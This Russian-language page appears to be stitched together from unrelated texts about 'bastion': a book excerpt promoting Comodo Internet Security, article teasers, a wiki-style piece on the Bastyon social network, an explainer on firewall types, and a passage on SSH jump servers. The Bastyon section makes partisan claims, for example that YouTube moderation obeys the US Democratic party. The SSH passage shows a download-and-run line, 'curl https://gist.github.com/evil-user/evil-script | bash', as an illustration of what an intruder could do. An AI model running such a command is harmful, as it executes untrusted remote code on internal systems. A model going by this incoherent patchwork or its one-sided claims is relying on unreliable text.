Что такое бастион в интернете

7.1. Что такое бастион и зачем он нужен?

Бастион (он же брандмауэр, он же firewall) – это пакетный фильтр, позволяющий защитить ваш компьютер от действия вредоносных программ, сетевых червей, нежелательного трафика и всевозможных атак.

Разберемся, как работает бастион. Данные по сети передаются частями, которые называются пакетами. Каждый пакет состоит из двух основных частей: области заголовков и области данных. Первая область содержит служебную информацию: IP-адрес отправителя пакета, IP-адрес получателя пакета, порты отправителя и получателя и др. Вторая область содержит передаваемые данные: часть электронного письма, часть файла, часть голосового сообщения и т. д. Брандмауэр (привыкайте к разным названиям) перехватывает все сетевые пакеты и сопоставляет область заголовка (иногда и область данных) набору правил. Набор правил обычно задается администратором системы. Например, вы можете запретить обращение к определенному узлу. Это может понадобиться, чтобы другие пользователи компьютера (ваши дети, допустим) не смогли получить доступ к нежелательным узлам.

Брандмауэры обычно устанавливаются на так называемых граничных компьютерах – компьютерах, предоставляющих доступ к Интернету другим пользователям сети. Существуют даже аппаратные брандмауэры – специальные устройства, которые выполняют маршрутизацию и фильтрацию пакетов. Скорее всего, такой брандмауэр установлен у вашего провайдера. Но, как показывает практика, рабочие станции требуют дополнительной защиты, поскольку администратор сети не может проконтролировать все компьютеры сети (особенно это сложно сделать с сетью провайдера – ведь для максимальной защиты нужно пройтись по всем клиентам и защитить каждый компьютер). Поэтому весьма желательно установить локальный брандмауэр. Такой бастион будет защищать наш и только наш компьютер. К тому же локальные бастионы часто оснащаются дополнительными приятными функциями: детектором атак, средством для поиска шпионских программы и др.

В этой главе мы рассмотрим локальный бастион Comodo Internet Security. Продукты семейства Comodo отлично зарекомендовали себя. Лично я достаточно долго тестировал линейку продуктов Comodo в операционных системах Windows XP (нужен как минимум Service Pack 2), Vista и Windows 7, и за три года эксплуатации программы в разных операционных системах мои компьютеры не поймали ни одного вируса! Думаю, это неплохой показатель.

Кроме рассматриваемой здесь программы Comodo Internet Security на сайте http://www.comodo.com/ доступны много других программ, среди которых нужно выделить:

? Comodo Antivirus – отличный антивирус, защищающий компьютер от вирусов, сетевых червей, программ-шпионов (spyware) и других вредоносных программ;

? Comodo Firewall – бесплатный брандмауэр, надежность которого проверена временем.

Программа Comodo Internet Security содержит в себе функции обеих указанных программ, то есть является одновременно и антивирусом, и брандмауэром. Получается вполне достойный соперник Kaspersky Internet Security. Кроме того, Comodo Internet Security, как уже отмечалось, абсолютно бесплатна и обладает русским интерфейсом, что немаловажно для начинающих пользователей.

Рассмотрим основные возможности программы:

? проактивная защита – защищает систему в реальном времени, позволяет блокировать доступ вредоносных программ к системным файлам и реестру. Позволяет обнаружить потенциально опасные программы (необязательно вирусы);

? эвристический анализ – способность антивируса обнаружить неизвестные антивирусным базам вредоносные программы. Обычно антивирус сравнивает запускаемый программный код с записями в антивирусной базе. Если найдено совпадение, то вирус найден, и запускаемый код блокируется. Однако вирусописатели могут создать новую версию вируса – по образу и подобию старой – вирус получит немного иной код, но будет выполнять практически те же действия. В этом случае обычный антивирус не сможет выявить вирус, а антивирус с функцией эвристического анализа справится с задачей;

? защита от интернет-атак – никто не сможет атаковать ваш компьютер извне;

? защита от переполнения буфера – некоторые программы специально вызывают переполнение буфера, чтобы воспользоваться этим для получения дополнительных привилегий доступа;

? защита от несанкционированного доступа и вирусов – название этой функции говорит за себя и в комментариях не нуждается;

? ежедневные автоматические обновления антивирусных баз – нет никакого толку от антивируса, базы которого обновляются раз в полгода. Базы Comodo обновляются каждый день. Не забудьте только включить автоматическое обновление или регулярно обновляйте базы вручную!

? изолирование подозрительных файлов в карантин для предотвращения инфекции – стандартная функция антивируса;

? встроенный планировщик сканирования – вы можете создать расписание проверок компьютера, чтобы процесс проверки не мешал выполнению других программ, с которыми вы работаете;

? сканирование на наличие вредоносных программ в безопасном режиме Windows – не каждый антивирус умеет работать в безопасном режиме, даже антивирус Касперского не умеет этого (во всяком случае, последняя версия, с которой я работал). Так что пользователям Касперского приходится использовать другие средства;

? возможность создания точек восстановления системы – функция довольно удобная, но нужно отметить, что точки восстановления системы можно создать и средствами самой системы;

? использование технологии Sandbox (песочница) – вы скачали программу и знаете, что она может быть потенциально опасна? Тогда попробуйте запустить ее в песочнице[6] – выполняясь в песочнице, программа не сможет причинить вред вашей системе.

Данный текст является ознакомительным фрагментом.

Продолжение на ЛитРес

Читайте также

Зачем нужен break flag [%] при описании policy

Зачем нужен break flag [%] при описании policy Для версий netams 3.1.xx, 3.2.xx и 3.3.xx до build 2117:Если вы задаете последовательность из нескольких политик фильтрации трафика подряд, то по умолчанию их действие суммируется, т.е. в случаеservice processorpolicy name all–ip target proto ippolicy name tcp target proto tcpunit host name HOST1 ip

1.3. Что такое Windows Product Activation, и зачем он нужен?

1.3. Что такое Windows Product Activation, и зачем он нужен? Это новая технология, разработанная Microsoft для борьбы с нелегальными копиями их программного обеспечения. Впервые подобный механизм был опробован на Terminal Service, из W2k Server, теперь же, похоже, подобным образом будут защищаться

Зачем вашей компании может быть нужен корпоративный блог?

Зачем вашей компании может быть нужен корпоративный блог? Не знают, зачем нужен корпоративный блог, всего семь человек. «Создание имиджа компании» повторяется в ответах категории «Другое» несколько раз как дополнение к влиянию на соискателей, инвесторов. Один из

Что такое протокол и зачем он нужен

Что такое протокол и зачем он нужен В предыдущем разделе была очень кратко рассмотрена модель ISO/OSI, которая описывает работу любого сетевого оборудования и сети в целом. Однако это всего лишь модель, рисунок на бумаге. Чтобы все это начало работать, необходим реализующий

Зачем нужен Интернет?

Зачем нужен Интернет? Не буду утверждать, что практически все пользователи на русскоязычном пространстве знакомы с Интернетом. Но буду утверждать, что практически все что-либо о нем слышали. Говорят же о нем разное. Например, что в Интернет входят и потом там бродят, что

Зачем Windows нужен свой собственный голосовой мессенджер?

Зачем Windows нужен свой собственный голосовой мессенджер? Разработчики Windows почему-то решили, что в их операционной системе обязательно должно быть все свое, как говорится, родное. Все самые интересные компьютерные возможности: запись CD/DVD-дисков, монтаж фильмов, голосовое и

Зачем нужен Radmin

Зачем нужен Radmin Radmin — это сокращение от Remote Administrator, что дословно переводится как удаленный администратор. Да, существуют такие программы, которые позволяют нам, находясь за своим компьютером, видеть рабочий стол другого, и не только видеть, но и управлять его мышью и

1.3. Зачем нужен интернет-маркетинг

1.3. Зачем нужен интернет-маркетинг Почему бы нам не использовать другие способы маркетинга, вообще не привлекая для этого Интернет? Казалось бы, если коммуникация через Интернет столь затруднена, людей, пользующихся им, значительно меньше, чем тех, кто смотрит телевизор,

Зачем нужен файловый менеджер

Зачем нужен файловый менеджер Файловый менеджер необходим как для разработчиков, так и для пользователей. С его помощью можно просматривать содержимое папок, удалять лишние файлы, создавать новые папки и выполнять другие операции с файлами. Трудно сказать, почему Microsoft

26.1. Зачем нужен Web-сервер в домашней сети?

26.1. Зачем нужен Web-сервер в домашней сети? Некоторым Linux-пользователям Ubuntu не нравится: уж больно она проста. Но простота не означает примитивность, что мы и докажем в этой главе, превратив обычную рабочую станцию в сервер сети — настроим Web-сервер с поддержкой PHP, FTP-сервер и

Зачем нужен дистрибьютор, или Кому полезен кризис Леваков Владимир

Зачем нужен дистрибьютор, или Кому полезен кризис Леваков Владимир Дистрибуция воспринимается многими как достаточно «инертный» по сравнению с другими сегментами ИТ-рынка бизнес. Это не совсем так: безусловно, дистрибьютор может занимать пассивную

Глава 1 Кому и зачем нужен ноутбук

Глава 1 Кому и зачем нужен ноутбук Ответ прост: скорее всего, ноутбук нужен именно вам! Так же, как и большинству пользователей, проводящим за компьютером значительную часть времени.Сказанное требует внятной и доходчивой аргументации. Причем объяснять необходимость

Зачем нужен кулер

Зачем нужен кулер Вернемся к неприятному разговору о перегреве процессора. Как и обещали, сейчас мы расскажем о том, почему так происходит, а также о методах борьбы с этим пагубным и, увы, постоянным явлением.Почему процессор нагревается в процессе работы? Из курса

Что это такое и зачем оно вам

Что это такое и зачем оно вам У Интернета есть много различных определений, в том числе и таких, которые могут только напугать. Я предпочитаю следующее: « Интернет – это огромное хранилище информации, которая содержится на разных компьютерах по всему миру, а также способы

Bastyon

Bastyon (Бастион) — многоязычный интернет-проект (блогоплатформа и социальная сеть), который направлен на создание децентрализованной платформы со средствами противодействия интернет-цензуре, которая всё больше набирает обороты в современности во многих странах. Создан российским разработчиком. Также есть возможность заработка криптовалюты за проявление активности на сайте.

Большое интервью с основателем БАСТИОНА / BASTYON

Простой логотип проекта

Сравнение с традиционными социальными сетями

Описание [ править ]

Создателем проекта является российский математик и специалист в области искусственного интеллекта и экономики Даниил Сачков, который поставил своей целью реализацию независимого от корпораций и капиталистов ресурсов, который будет невозможно модерировать за счёт внешнего воздействия. Фактическим поводом для организации ресурса стала по всей видимости сильная цензура на YouTube, на котором практически невозможно опубликовать материалы по некоторым темам из-за модерации, подчиняющейся демократической партии США. Был запущен проект в начале 2022 года и быстро набрал популярность.

Основным принципом проекта заявлена конфиденциальность пользователей и их безопасность, для создания учётной записи на сайте достаточно использовать только электронную почту, не требуется указание номера телефона, как на значительном количестве сайтов, а также разрешено создавать любое количество учётных записей.

Для работы применяется принцип блокчейна, тот самый, что входит в основу известных криптовалют. Таким образом, сеть способна существовать, пока есть хотя бы несколько её пользователей, что предотвращает отправление цензуры со стороны государства. Также утверждается независимость от системы доменных имён. Принципиальной особенностью проекта является открытый исходный код, который размещён на сервисе GitHub и позволяет убедить в надёжности системы.

Используется принцип общественной модерации контента и отсутствия возможности централизованного управления со стороны администраторов и модераторов, которые имеются на большинстве сайтов. В этом плане напоминает развитие идеи Фидонета, который также работал на основе пользователей без серверов (однако имелась более примитивная ранговая система модерации).

За размещение популярного контента на сайте пользователи получают криптомонеты PKOIN или Покеткойн (стоит примерно 1 доллар или 60 рублей). Прибыль идет исключительно блогерам, комиссия системы не взимается, конкретный объем прибыли зависит от оценок контента пользователями. Также покеткойны получают пользователи, которые держат на своих компьютерах ноды сети и вкладывают в них уже приобретенные ранее покеткойны (аналогично накопительным банковским счетам, за полгода начисляется 40 % монеток от вложенных).

У пользователей есть репутация (числовое значение, отражающее общую оценку всех размещенных материалов), что делает сайт близким по сути к онлайн-блогам с системой кармы вроде Leprosorium.ru. Если репутация пользователя достигает −30, его аккаунт автоматически блокируется. Также предполагается система общественной модерации для нелегального контента (порнографии и наркотиков), когда при достижении определённого количества отметок производится виртуальный суд на аккаунтом на предмет запрещённой информации. Утверждается, что блокировка контента по мотивам несогласия с ним запрещена, однако возможна отметка низкокачественных материалов.

Для возможности влиять на контент пользователь должен получить определенный размер кармы (в первое время 100), а также 100 пользователей с уже подтвержденными аккаунтами, которые проголосовали за него. Это сделано для избежания накруток с использованием нескольких аккаунтов, которые разрешены.

Контент [ править ]

Проект напоминает Яндекс.Дзен, но только более анонимной направленности. На главной странице сайта представлена лента, в которой размещаются все новые статьи в хронологическом порядке. Есть возможность отсортировать «только популярные» посты, посмотреть отдельно статьи, видео и картинки, а также почитать новые материалы только по некоторым тегам.

На сайте популярен контент на острополитические тематики, которые запрещены на других сайтах, причем есть как видео с точки зрения России (что запрещено на YouTube), критика официальной позиции по Covid-19 (не одобряется в большинстве стран мира), так и например националистические исследования типа «КАК УБИВАЮТ БЕЛЫХ. СВЕЖЕЕ. ДЗЕН БЛОКИРУЕТ ЧЕРЕЗ 5 МИНУТ». Упор делается именно на подобные спорные материалы.

В англоязычном разделе также популярны мемы против Covid-19, критика мирового правительства.

На сайте много постинга и обычных мемов и иного стандартного бессмысленного контента, которых можно в значительном количестве найти и в совершенно стандартных социальных сетях. Мемы занимают в списке популярных тегов второе место после политики, так как видимо даже на анонимной платформе людям интересно почитать что-то просто развлекательное.

Цитаты [ править ]

Даниель и вся команда Бастиона настоящие воины света, молодцы, всех благ им! Процветания нашему Бастиона.

Типы брандмауэров

Брандмауэры, вероятно, являются одной из самых распространенных вещей, о которых люди думают, когда речь идет о безопасности. Мы собираемся рассмотреть множество различных способов, которыми брандмауэры защищают системы, рассмотреть различные архитектуры брандмауэров и рассмотреть различные способы, которыми они защищают эти системы от определенных классов атак. Брандмауэры — очень фундаментальный элемент управления безопасностью, и это одна из вещей, о которых мы чаще всего думаем, когда слышим о безопасности информационных систем. Брандмауэры стали настолько распространены, что в наши дни даже дома вы часто найдете несколько брандмауэров. В Windows есть встроенный брандмауэр, в большинство домашних маршрутизаторов встроен брандмауэр, и как только мы перейдем к корпоративным сетям, у нас обычно будет несколько брандмауэров, часто это очень высококлассное оборудование, защищающее различные системы в сети. Брандмауэры являются основой контроля безопасности. Существует множество различных архитектур брандмауэров, и вскоре мы рассмотрим некоторые из них. Очень часто межсетевые экраны располагаются между разными сегментами сети. Вы можете найти брандмауэр, правильно настроенный для пропуска веб- трафика, но это не остановит злоумышленника, доставляющего полезную нагрузку через HTTP с использованием порта 80.

Брандмауэры, как правило, контролируют двунаправленный поток трафика, поэтому представьте себе брандмауэр перед организацией, отделяющий ее от общедоступного Интернета. Он должен иметь возможность блокировать входящий трафик, чтобы попытаться удержать злоумышленников, но он также должен иметь возможность разрешать исходящий трафик, потому что людям нужно просматривать веб-страницы, отправлять электронные письма и иметь связь, которая выходит за пределы сети.

Реализации брандмауэра

Мы часто используем термин брандмауэр, но он может означать очень разные реализации концепции, и, вероятно, одним из самых основных приложений брандмауэра является брандмауэр Windows, встроенный в современные версии операционных систем. Это довольно простой брандмауэр. Он определит разрешенные классы входящего трафика и классы исходящего трафика. Это хост-брандмауэр, работающий на компьютерах. Представьте, что ваш компьютер находится в вашей собственной доверенной сети, но у вас все еще есть брандмауэр между вашей машиной и любой другой машиной в ней. Часто у вас будет несколько разных классов брандмауэров для разных точек в сетевой среде. Я говорю только о небольшой домашней сети, но то же самое верно и для организационных сетей. Одна вещь, которая сильно отличается между личным решением и корпоративной средой, заключается в следующем. На предприятии вы увидите такое оборудование, как межсетевой экран Cisco. Это физическое устройство, устанавливаемое в стойку, и этот класс машин предназначен для сегментации сети, о которой мы говорили ранее. Он предназначен для размещения между сегментами общедоступной сети и сегментами частной сети. Мы также видим аппаратные брандмауэры, встроенные в такие устройства, как домашние маршрутизаторы, за исключением того, что они предназначены для совершенно другого класса использования, но предпосылка наличия брандмауэра, который является просто программным продуктом, по сравнению с брандмауэром, который является выделенной частью инфраструктуры, одна и та же. Действительно, многие вещи, которые делают эти два различных класса межсетевых экранов, также очень похожи. Например, большинство из них выполняют простую фильтрацию пакетов.

Архитектура брандмауэра

Мы рассмотрим три различные архитектуры брандмауэров, но я хочу начать с определения, и это важно, и оно относится не только к брандмауэрам, но и к любому хосту, который полностью подвержен атаке. Концепция бастионного брандмауэра заключается в том, что это будет брандмауэр, обращенный к общедоступной сети. Перед ним нет защиты. Он должен нести все последствия атаки, направленной на сеть. Хост-бастион является критически важной частью инфраструктуры просто потому, что это первая линия обороны. Это термин, который используется не только для брандмауэров, но и для любого актива, который полностью подвержен атаке. Он находится между Интернетом и внутренней сетью, выступая в качестве первой линии защиты, и полностью незащищен. Хост-бастион все еще может иметь пару разных реализаций, так, например, это может быть односетевой брандмауэр, чтобы у него был один сетевой интерфейс, и весь трафик входил и выходил через этот интерфейс, а затем программное обеспечение сделало бы фильтрацию. Он может быть двухсетевым, чтобы иметь два сетевых интерфейса, и действительно, это более типичная реализация, особенно в продуктах коммерческого уровня. Мы говорим о внешнем трафике, поступающем в один порт, и внутреннем трафике через другой. У нас по-прежнему есть программное обеспечение для фильтрации и определения того, какой трафик проходит, а какой отбрасывается, но у нас есть большая сегментация сетей благодаря двум сетевым адаптерам, также известным как карты сетевого интерфейса. Это брандмауэр узла-бастиона, поэтому давайте перейдем к следующему, называемому брандмауэром экранированной подсети. Экранированный брандмауэр подсети также называется тройным брандмауэром, который будет иметь три сетевых интерфейса и разделяет трафик на три логических сетевых сегмента. Есть общедоступный интернет, внутренняя сеть, так что это будет то же самое, что и типичный бастион с двойным подключением.

Немного о DMZ

Идея DMZ заключается в том, что мы говорим о сети демилитаризованных зон. Проще говоря, DMZ — это не что иное, как отдельная подсеть в сети. Он содержит активы, которые вы хотите выставить на всеобщее обозрение, поэтому он должен быть доступен через Интернет. Одна и та же подсеть также будет доступна для внутренней сети, хотя для каждой из них могут быть доступны разные службы. Это распространенная структура для организации, где у них есть активы, которые они хотели бы выставить на всеобщее обозрение, и у них есть другие активы, а именно их внутренняя сеть, которую они хотят отделить. Брандмауэр экранированной подсети должен быть в состоянии обеспечить наличие этих средств контроля доступа. С обоими типами брандмауэров мы по-прежнему хотим, чтобы трафик шел во всех направлениях. Например, мы хотим, чтобы внутренняя сеть могла отправлять HTTP- запросы в Интернет, поэтому брандмауэр должен пропускать этот трафик, а затем нам нужны ответы, поэтому он должен разрешить HTTP через порт 80 и неизбежно порт 443 для HTTPS, он должен позволить этому трафику вернуться во внутреннюю сеть. Это снова двунаправленный поток трафика. В таком случае также необходимо разрешить HTTP-запросам из Интернета проходить в демилитаризованную зону, а затем возвращать эти ответы. Однако в такой модели мы можем не захотеть, чтобы Интернет создавал FTP-соединения с демилитаризованной зоной. Ничего страшного, если внутренняя сеть FTP подключена к DMZ, потому что именно они контролируют активы на этих внешних веб-сайтах, но это должно быть отделено от самого Интернета в целом. Экранированный брандмауэр подсети должен жонглировать целой кучей различных правил с точки зрения того, откуда и куда может поступать трафик, а также портов и протоколов.

Брандмауэры с фильтрацией пакетов

Брандмауэр с фильтрацией пакетов — одна из наиболее распространенных сегодня реализаций средств контроля безопасности. Обычно вы увидите, что он реализован как модель узла-бастиона, обращенная к атакующим без какой- либо другой линии защиты перед ним. Брандмауэр с фильтрацией пакетов во многих отношениях довольно прост. У нас есть исходный входящий трафик, набор элементов управления на уровне пакетов, а затем допустимый проходящий трафик. Давайте внимательно посмотрим на эти элементы управления. Например, брандмауэр с фильтрацией пакетов может определять допустимые IP-адреса источника и получателя. В одном месте вы можете увидеть, что если есть вредоносный трафик, исходящий с определенного IP-адреса, брандмауэр с фильтрацией пакетов может занести его в черный список и заблокировать любые запросы, поступающие с этого конкретного IP-адреса. Структура самого заголовка TCP также является тем, на что может смотреть брандмауэр с фильтрацией пакетов. Например, что такое исходный и конечный порты? Должен ли брандмауэр разрешать порт 80 для HTTP и порт 443 для HTTPS? Что-то еще не разрешено? протоколы; HTTP это хорошо. Может быть, SMTP тоже хорош, но все остальное, например FTP или ICMP, будет заблокирован? Это довольно рудиментарно, хотя вы можете захотеть заблокировать такие вещи, как FTP, потому что вы беспокоитесь, что он может быть использован для эксфильтрации данных, также могут быть атаки, которые приходят через HTTP, и брандмауэр с фильтром пакетов пропустит эту атаку, потому что он не просматривает сами данные, а также не просматривает любую другую информацию в этих заголовках запросов. Это очень рудиментарный элемент управления, но это первая линия защиты. Далее рассмотрим другие брандмауэры, которые затем могут располагаться за сетью, но помните, что они должны учитывать трафик, идущий с другой стороны.

А как насчет трафика, поступающего с внутреннего сервера и возвращающегося обратно к клиенту? Это важно, потому что, что, если злоумышленник скомпрометировал сам сервер, и теперь он пытается эксфильтровать данные. Брандмауэр с фильтрацией пакетов может ограничить возможность злоумышленника отправлять эти данные обратно из сети. Брандмауэр с фильтрацией пакетов либо пропустит запрос, либо отбросит его, так что он вообще не пройдет. Это очень упрощенная реализация, которая не особенно интеллектуальна, но одна из причин, по которой брандмауэры с фильтрацией пакетов остаются распространенными, заключается в том, что они также недорогие.

Брандмауэр шлюза

С точки зрения модели OSI, также известной как модель взаимодействия компьютерных сетей с открытыми системами, контрольной точкой, на которой выполняются различные атаки и средства контроля, является транспортный уровень. Транспортный уровень также известен как четвертый уровень, и именно здесь, например, TCP-запросы передаются вперед и назад. Когда мы говорим о брандмауэре шлюза на уровне канала, мы собираемся немного подняться по стеку. Мы говорим о сеансовом уровне, также известном как уровень 5, и он находится там как прокладка между прикладным и транспортным уровнями, так что это более высокоуровневая, более абстрактная концепция, чем то, что мы просто рассматриваем в TCP. Много раз, когда вы просматриваете Интернет, вы общаетесь через брандмауэр шлюза на уровне канала. Очень вероятно, что помимо брандмауэра с фильтрацией пакетов, брандмауэр также может выполнять несколько ролей. Роль брандмауэра шлюза на уровне канала заключается в передаче запросов между двумя отдельными хостами, например, клиентом и сервером. Мы можем увидеть, как TCP-запрос поступает на брандмауэр, а затем передается на сервер. В этом примере представьте, что брандмауэр действует как шлюз, а затем ответ вернется через этот брандмауэр и, в конечном итоге, вернется к клиенту. Здесь важно то, что эти две конечные точки, клиент и сервер, никогда не устанавливают прямое соединение. Все проходит через межсетевой экран шлюза на уровне канала. Поэтому этот брандмауэр создает два соединения: одно к клиенту и одно к серверу. Он сидит там и отслеживает такие вещи, как трехстороннее рукопожатие TCP, и, таким образом, он может установить, является ли этот запрос правомерным или нет.

Например, кто-то пытается извлечь данные из сети и как в случае с брандмауэром с фильтрацией пакетов, брандмауэр шлюза на уровне канала по-прежнему будет пропускать большое количество данных, которые потенциально могут быть использованы для злоумышленных целей. Например, если шлюз предназначен для обеспечения HTTP-связи, а клиент активно использует риск SQL-инъекций на самом сервере, то брандмауэр разрешит запросы и ответы через законный HTTP-трафик, по крайней мере, с точки зрения соответствия. к ожидаемой структуре брандмауэра. Например, если это HTTP на порту 80, он пропустит его, но не обеспечит никакой защиты на уровне пакетов. Это просто подтверждает, что эти связи являются законными. Еще одна модель брандмауэра, которую вы обычно видите в таких вещах, как домашние кабельные модемы и маршрутизаторы, и вы часто увидите, как она реализует NAT, также известную как преобразование сетевых адресов, поэтому вы можете иметь несколько клиентов, сидящих за этим брандмауэром, и все они используют один выход в Интернет. Как и брандмауэр с фильтрацией пакетов, это важная часть инфраструктуры, но очень примитивная. Ситуация становится более сложной, когда мы переходим к межсетевому экрану шлюза уровня приложений.

Брандмауэры приложений

Этот брандмауэр находится намного выше в этой модели OSI. Он находится на седьмом
уровне, прямо на вершине стека OSI. Часто вы можете увидеть, что это называется прокси, особенно внутри корпоративных сетей, и они также включают аутентификацию для определения того, кто является клиентом. В некотором смысле он похож на брандмауэр шлюза на уровне канала в том смысле, что он будет ретранслировать эти запросы взад и вперед между двумя разными хостами, но отличается тем, что находится в стеке. Например, мы можем видеть, как он перехватывает HTTP-трафик, но это не просто HTTP, он может сидеть там и просматривать FTP, SMTP или другие протоколы, зависящие от приложения. Важной особенностью брандмауэра шлюза уровня приложений является возможность проверять содержимое трафика. В зависимости от направления трафика этот класс межсетевых экранов может выполнять самые разные задачи. Когда он действует как шлюз, когда клиент находится внутри корпоративной сети и отправляет внешние запросы, он может делать такие вещи, как блокировка определенных сайтов. С другой стороны, когда он сидит перед активом, таким как сервер, он может проверять содержимое трафика, может начать искать типичные схемы атак. Это то, что, например, Cloudflare делает со своим брандмауэром в качестве сервисного продукта. Он задает такие вопросы, как: потенциально ли этот запрос является атакой с внедрением SQL? Шлюзовый брандмауэр прикладного уровня, находящийся на седьмом уровне и способный интерпретировать и понимать содержимое этих запросов, может быть гораздо более эффективным, чем простые реализации, такие как брандмауэр с фильтрацией пакетов. Он будет передавать данные вперед и назад, как и другие брандмауэры. Он должен иметь возможность принимать запросы, а затем отвечать соответствующим образом, но он может сделать это с более высоким уровнем сложности.

Другой пример: если трафик SMTP ходит вперед и назад через этот брандмауэр, он может разрешить приветственный комментарий, который клиент использует для идентификации себя на сервере, но затем он может заблокировать команду проверки, которая часто используется, чтобы установить, имеет ли сервер определенный адрес или нет. Тот же порт, тот же протокол, но гораздо более детальный контроль с точки зрения того, какой трафик идет через брандмауэр. Таким образом, это более высокое состояние осознания того, что делает трафик, а затем то, какой считается хорошим, а какой плохим. Есть еще одна модель брандмауэра, которой я хочу поделиться с вами, — брандмауэр с многоуровневой проверкой состояния.

Брандмауэры с отслеживанием состояния

Межсетевой экран многоуровневой проверки с отслеживанием состояния — это еще одна эволюция предыдущих моделей, о которых мы говорили. Как правило, он сочетает в себе аспекты трех последних рассмотренных нами моделей брандмауэров: фильтрацию пакетов, шлюз на уровне каналов и шлюз на уровне приложений. Мы будем говорить об инспекции, происходящей на нескольких уровнях коммуникации. Мы будем говорить о модели TCP/IP в отличие от модели OSI, но логически обе они охватывают одни и те же аспекты сети. Важно то, что когда мы говорим о многоуровневой проверке с отслеживанием состояния, мы говорим обо всем стеке, то есть о возможности пройти весь путь от этого низкого уровня пакетов TCP до протоколов связи приложений. Это означает, что эта модель брандмауэра может делать все то, о чем мы говорили до сих пор. Например, проверять содержимое HTTP-запросов, но, поскольку он сохраняет состояние, он также может работать с пакетами и запросами и выполнять такие действия, как разрешение пакетов только от известных активных соединений. Он должен смотреть на более широкое понятие, которое представляет собой связь. Это дает ему возможность делать такие вещи, как проверка пакетов с отслеживанием состояния, также известная как SPI, поэтому вместо того, чтобы обрабатывать каждый отдельный сетевой пакет по отдельности, например, брандмауэр без учета состояния, он может использовать подход с отслеживанием состояния и рассматривать пакеты более целостно. Ранее мы рассмотрели такую модель, как брандмауэр с фильтрацией пакетов, который не имеет состояния и не знает, является ли пакет частью существующего соединения или нет. Следовательно, модель с отслеживанием состояния поддерживает соединение. Все это означает, что межсетевой экран многоуровневой проверки с отслеживанием состояния может начать принимать решения о фильтрации на основе совокупных данных, то есть не только информации, которая проходит через него прямо сейчас, и не только отдельных пакетов.

Это привело нас к четырем уровням сложности брандмауэра. Фильтрация пакетов, шлюз на уровне каналов, шлюз на уровне приложений и многоуровневый межсетевой экран с отслеживанием состояния. Все эти классы брандмауэров производятся многими разными производителями, причем множество различных продуктов предназначено для самых разных аудиторий. Существует огромное количество продуктов для брандмауэров. Одна из вещей, которую противник хочет сделать очень рано, — это выяснить, какой брандмауэр стоит между ним и его целью.

Брандмауэры нового поколения

Межсетевые экраны нового поколения, появились на рынке относительно недавно. Такие компании, как Cisco или Palo Alto, уже используют многие концепции брандмауэров нового поколения. Межсетевые экраны нового поколения всегда будут включать межсетевой экран с отслеживанием состояния. Они будут охватывать брандмауэр, так что это будет его ядром, но это также добавит идею осведомленности о приложениях. Осведомленность о приложениях означает, что наш брандмауэр может отличить HTTP- сообщение, отправляемое на веб-сайт, от того, что кто-то помещает вредоносный код в HTTP-сообщение, чтобы попытаться провести атаку. Кроме того, он поставляется с пользовательским контролем, который не предназначен для контроля пользователей, а скорее для определения того, к чему у наших пользователей есть доступ. Когда мы используем эти брандмауэры нового поколения на границе нашего Интернета, мы получаем много возможностей контролировать, к каким конкретным ресурсам в Интернете могут получить доступ наши пользователи. Мы надеемся, что это поможет нам контролировать и предотвращать переход пользователей на заведомо вредоносные интернет-ресурсы. Для этого у нас также есть системы обнаружения вторжений, встроенные в брандмауэр нового поколения. Например, фильтры URL-адресов, чтобы предотвратить переход пользователей на вредоносные веб-сайты, или, если мы хотим, мы можем контролировать, на какие сайты пользователь может перейти.

• Типы брандмауэров
• Брандмауэры

Архитектура SSH. Узел-бастион и принцип нулевого доверия

В инфраструктуре организации есть такое понятие, как узел-бастион — специальный компьютер в сети, обычно на внешней стороне демилитаризованной зоны (ДМЗ) организации. Узел назван по военной терминологии. Если кто видел средневековые крепости, там есть специфические выступы — бастионы, как на КДПВ.

То же самое в компьютерных сетях. Например, перед защищённой компьютерной сетью ставится специальный сервер, через который пробрасывается SSH-туннель в свою частную сеть. Данный «бастион» организуется в соответствии с концепцией нулевого доверия, которая предполагает абсолютное недоверие ко всем объектам и пользователям как снаружи организации, так и внутри неё.

Есть несколько вариантов, как технически организовать такую схему. Можно всё сделать самому, а можно использовать готовые сервисы SaaS, которые решают эту задачу.

Узлы-бастионы используются для разных целей, в том числе:

• как веб-сервер,
• DNS-сервер,
• почтовый сервер (например, SMTP),
• FTP-сервер,
• прокси,
• NNTP-сервер,
• ловушка (honeypot),
• VPN-сервер,
• и др.

▍ Что такое джамп-сервер

Джамп-сервер (jump server) предоставляет доступ к сервисам внутренней инфраструктуры. Соответственно, для всех внешних (а то и внутренних) пользователей доступ к этим внутренним сервисам осуществляется только через бастион. В принципе, тут нет ничего сложного, а типичные решения для организации SSH-туннелей хорошо описаны на Хабре. Более конкретную инструкцию см. в статье «Помощь друзьям с использованием OSS для удалённого администрирования при наличии публичного IP-адреса».

Проблемы начинаются при масштабировании. Если мы организуем постоянный доступ для множества пользователей (например, для сотрудников организации), то такой сервер требует обслуживания и специальной настройки. Нам необходимы:

• особая конфигурация для доступа к конкретной среде (например, RDP и Windows);
• обязательное обновление последними патчами безопасности;
• ротация SSH-ключей и обновление, когда приходят/уходят сотрудники (ротация ключей SSH в любом случае необходима даже без изменения штатного списка — часто для этого применяют специальные модули или службы, то есть это ещё одна отдельная задача);
• управление ролями через sudo , проверка правильности настроек разрешений файловой системы и принадлежности пользователей к соответствующим группам. Нужно строго ограничивать возможности пользователей, чтобы они не навредили себе и другим, а именно:

• не хранили на джамп-сервере свои закрытые ключи;
• не пытались подключаться к внутренним службам, к которым им не положено иметь доступ;
• не превышали свои полномочия;
• и, естественно, нужно следить за подозрительным поведением, чтобы в ваш «бастион» не проникло постороннее лицо, потому что отсюда оно имеет доступ к внутренним системам и потенциально может запустить там вредоносный код самым элементарным способом:

$ ssh -A bob@jump-server $ ssh bob@internal-node $ curl https://gist.github.com/evil-user/evil-script | bash

Поддержка этой инфраструктуры становится дополнительной нагрузкой, которая ложится на плечи штатных инженеров и сисадминов. Никто не будет нанимать отдельный персонал для такой роли, хотя сама задача становится всё более сложной: растёт и нагрузка на сервер, и количество пользователей, и количество инструментов.

Взаимодействие с джамп-сервером осуществляется с помощью SSH-клиента. Это тоже представляет определённую проблему, потому что не всегда легко через SSH-клиент получить все нужные данные из службы внутри VPN. Необходимо сначала установить SSH-соединение с джамп-сервером, потом с другим сервером, затем скопировать искомое содержимое в файл (например, при помощи scp ). Вот нативный подход такого взаимодействия:

$ ssh -A bob@jump-server $ ssh bob@internal-server '/usr/local/bin/myscript.sh > output.csv' $ scp bob@internal-server:output.csv . && exit $ scp bob@jump-server:output.csv .

Локальный проброс портов:

$ ssh -N bob@jump-server -L 8080:internal-web-server:3000

